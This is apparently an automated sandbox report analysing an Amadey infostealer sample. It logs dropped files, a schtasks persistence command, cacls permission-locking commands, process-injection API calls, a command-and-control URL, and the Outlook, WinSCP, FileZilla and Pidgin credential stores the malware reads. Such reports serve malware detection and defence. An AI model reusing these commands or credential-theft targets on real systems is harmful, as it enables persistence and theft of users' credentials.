Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.sapara:R;.dinol:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00418D66 push ecx; ret	0_2_00418D79
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006E518A pushfd ; ret	0_2_006E518B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006E6BFB push ecx; iretd	0_2_006E6C05
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006E6B88 push edi; ret	0_2_006E6B89
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006E7E70 push ss; retf	0_2_006E7E71

Source: file.exe	Static PE information: section name: .sapara
Source: file.exe	Static PE information: section name: .dinol
Source: gntuud.exe.0.dr	Static PE information: section name: .sapara
Source: gntuud.exe.0.dr	Static PE information: section name: .dinol

Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	File created: C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe" /F

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe TID: 4216	Thread sleep time: -720000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe TID: 1888	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe TID: 4136	Thread sleep time: -540000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe TID: 1900	Thread sleep time: -1440000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe TID: 4216	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe TID: 4136	Thread sleep time: -180000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Thread delayed: delay time: 360000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Thread delayed: delay time: 180000	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	API coverage: 5.0 %
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	API coverage: 3.6 %

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00405470 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,

0_2_00405470

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00420C88 FindFirstFileExW,	0_2_00420C88
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Code function: 8_2_00420C88 FindFirstFileExW,	8_2_00420C88
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Code function: 8_2_00970EEF FindFirstFileExW,	8_2_00970EEF

Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Thread delayed: delay time: 50000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Thread delayed: delay time: 360000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Thread delayed: delay time: 180000	Jump to behavior

Source: rundll32.exe, 0000000D.00000002.350105961.000000000296A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00418B47 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00418B47

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00421EDE GetProcessHeap,

0_2_00421EDE

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041B9E1 mov eax, dword ptr fs:[00000030h]	0_2_0041B9E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041DFE2 mov eax, dword ptr fs:[00000030h]	0_2_0041DFE2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006E3F4B push dword ptr fs:[00000030h]	0_2_006E3F4B
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Code function: 8_2_0041B9E1 mov eax, dword ptr fs:[00000030h]	8_2_0041B9E1
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Code function: 8_2_0041DFE2 mov eax, dword ptr fs:[00000030h]	8_2_0041DFE2
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Code function: 8_2_0095092B mov eax, dword ptr fs:[00000030h]	8_2_0095092B
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Code function: 8_2_0096E249 mov eax, dword ptr fs:[00000030h]	8_2_0096E249
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Code function: 8_2_0096BC48 mov eax, dword ptr fs:[00000030h]	8_2_0096BC48
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Code function: 8_2_00950D90 mov eax, dword ptr fs:[00000030h]	8_2_00950D90

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00418243 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00418243
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00418B47 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00418B47
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041CB60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041CB60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00418CAC SetUnhandledExceptionFilter,	0_2_00418CAC
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Code function: 8_2_00418243 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00418243
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Code function: 8_2_00418B47 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00418B47
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Code function: 8_2_0041CB60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_0041CB60
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Code function: 8_2_009684AA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_009684AA
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Code function: 8_2_00968DAE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00968DAE
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Code function: 8_2_0096CDC7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_0096CDC7

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 31.41.244.237 80			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 192.168.2.4 80			Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00403FB0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,

0_2_00403FB0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004043C0 ShellExecuteA,

0_2_004043C0

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe "C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe" /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y\|CACLS "..\9c69749b54" /P "user:N"&&CACLS "..\9c69749b54" /P "user:R" /E&&Exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll, Main	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\9c69749b54" /P "user:N"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\9c69749b54" /P "user:R" /E	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Queries volume information: C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Queries volume information: C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00418967 cpuid

0_2_00418967

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00418D81 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00418D81

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00424CA6 _free,_free,_free,GetTimeZoneInformation,_free,

0_2_00424CA6

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00405470 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,

0_2_00405470

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0040B8C0 GetUserNameA,SetCurrentDirectoryA,

0_2_0040B8C0

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 8.3.gntuud.exe.990000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.5f0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.gntuud.exe.950e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.gntuud.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.gntuud.exe.2120000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.gntuud.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.gntuud.exe.2120000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.gntuud.exe.950e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.gntuud.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.5f0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.650000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.311169503.0000000000650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.326614950.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.314200617.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.383588182.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll, type: DROPPED

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml

Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Exploitation for Privilege Escalation	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	211 Process Injection	2 Obfuscated Files or Information	1 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	1 Services File Permissions Weakness	1 Scheduled Task/Job	2 Software Packing	2 Credentials in Registry	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	Automated Exfiltration	1 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 Registry Run Keys / Startup Folder	1 Masquerading	1 Credentials In Files	24 System Information Discovery	Distributed Component Object Model	1 Email Collection	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	1 Services File Permissions Weakness	21 Virtualization/Sandbox Evasion	LSA Secrets	121 Security Software Discovery	SSH	1 Input Capture	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	211 Process Injection	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Services File Permissions Weakness	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Rundll32	Proc Filesystem	1 System Owner/User Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll	100%	Avira	HEUR/AGEN.1233121
C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll	100%	Avira	HEUR/AGEN.1233121
C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll	88%	ReversingLabs	Win32.Infostealer.Decred
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll	76%	Virustotal		Browse
C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll	88%	ReversingLabs	Win32.Infostealer.Decred

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
31.41.244.237/jg94cVd30f/index.php	1%	Virustotal		Browse
31.41.244.237/jg94cVd30f/index.php	100%	Avira URL Cloud	malware
http://31.41.244.237/jg94cVd30f/index.phpM	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
31.41.244.237/jg94cVd30f/index.php	true	1%, Virustotal, Browse Avira URL Cloud: malware	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://31.41.244.237/jg94cVd30f/index.phpM	gntuud.exe, 00000001.00000003.359344808.00000000006A6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
31.41.244.237	unknown	Russian Federation		61974	AEROEXPRESS-ASRU	true

Private

IP
192.168.2.4

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	764030
Start date and time:	2022-12-09 10:31:09 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	file.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.spyw.evad.winEXE@24/9@0/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 0.2% (good quality ratio 0.2%) Quality average: 67.3% Quality standard deviation: 15.3%
HCA Information:	Successful, ratio: 88% Number of executed functions: 21 Number of non-executed functions: 117
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:32:16	API Interceptor	2302x Sleep call for process: gntuud.exe modified
10:32:18	Task Scheduler	Run new task: gntuud.exe path: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
31.41.244.237	XYWF5aWLzq.dll	Get hash	malicious	Browse	31.41.244.237/jg94cVd30f/index.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AEROEXPRESS-ASRU	file.exe	Get hash	malicious	Browse	31.41.244.237
	file.exe	Get hash	malicious	Browse	31.41.244.237
	file.exe	Get hash	malicious	Browse	31.41.244.237
	file.exe	Get hash	malicious	Browse	31.41.244.237
	file.exe	Get hash	malicious	Browse	31.41.244.237
	file.exe	Get hash	malicious	Browse	31.41.244.237
	file.exe	Get hash	malicious	Browse	31.41.244.237
	file.exe	Get hash	malicious	Browse	31.41.244.237
	file.exe	Get hash	malicious	Browse	31.41.244.237
	file.exe	Get hash	malicious	Browse	31.41.244.237
	file.exe	Get hash	malicious	Browse	31.41.244.237
	file.exe	Get hash	malicious	Browse	31.41.244.237
	file.exe	Get hash	malicious	Browse	31.41.244.237
	file.exe	Get hash	malicious	Browse	31.41.244.237
	file.exe	Get hash	malicious	Browse	31.41.244.237
	file.exe	Get hash	malicious	Browse	31.41.244.237
	file.exe	Get hash	malicious	Browse	31.41.244.237
	file.exe	Get hash	malicious	Browse	31.41.244.237
	file.exe	Get hash	malicious	Browse	31.41.244.237
	file.exe	Get hash	malicious	Browse	31.41.244.237

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	129024
Entropy (8bit):	6.511981065302762
Encrypted:	false
SSDEEP:	3072:Yx7pOYzBek53tiINwyP7XSSJds3zhrjPcnqULv4i9:Yx7ZNh53vwyOztPc3L
